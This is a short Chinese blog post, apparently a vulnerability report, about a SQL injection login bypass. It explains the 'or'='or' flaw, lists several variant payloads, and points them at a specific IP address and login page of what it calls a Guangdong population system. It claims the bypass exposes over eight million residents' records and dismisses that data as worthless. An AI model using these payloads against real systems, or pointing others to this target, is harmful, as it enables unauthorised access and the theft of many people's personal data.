古老方法轻松拿下广东X平台,千万用户数据呀~反正不值钱

信息安全 4445 Views

'or'='or'漏洞是一个比较古老的漏洞了,它主要出现在后台登陆上,利用这个漏洞,我们可以不需要密码而进入系统的后台。它出现的原因是在编程的时候逻辑上考虑不足,还有就是没有对单引号进行过滤,从而导致了漏洞的出现。逻辑上考虑不足是在AND和OR上面没有考虑到他们的关系,这为'or'='or'提供了前提条件,而单引号没有过滤则为漏洞提供了触发条件,两者一结合就出现了这类漏洞了。在后面我会给大家从代码的角度完全解释这个漏洞,这里简单的给大家介绍一下。

利用这类漏洞进入不仅仅只有'or'='or',还有其他的语句,其他类似语句有a'or'1=1–、'or1=1–、"or1=1–、or1=1–、'or'a'='a、"or"="a'='a、') or ('a'='a等等

http://121.10.6.182/xgrptwo/index.jsp 地址 admin’OR’a’=’a 密码

任意选择,通杀 漏洞证明: 现住人口400多万,离去人口600多万。 仅仅查询了一个系统,800多万。其他的不过多深入 修复方案: 加强过滤

如未说明则本站原创,转载请注明出处:NULL » 古老方法轻松拿下广东X平台,千万用户数据呀~反正不值钱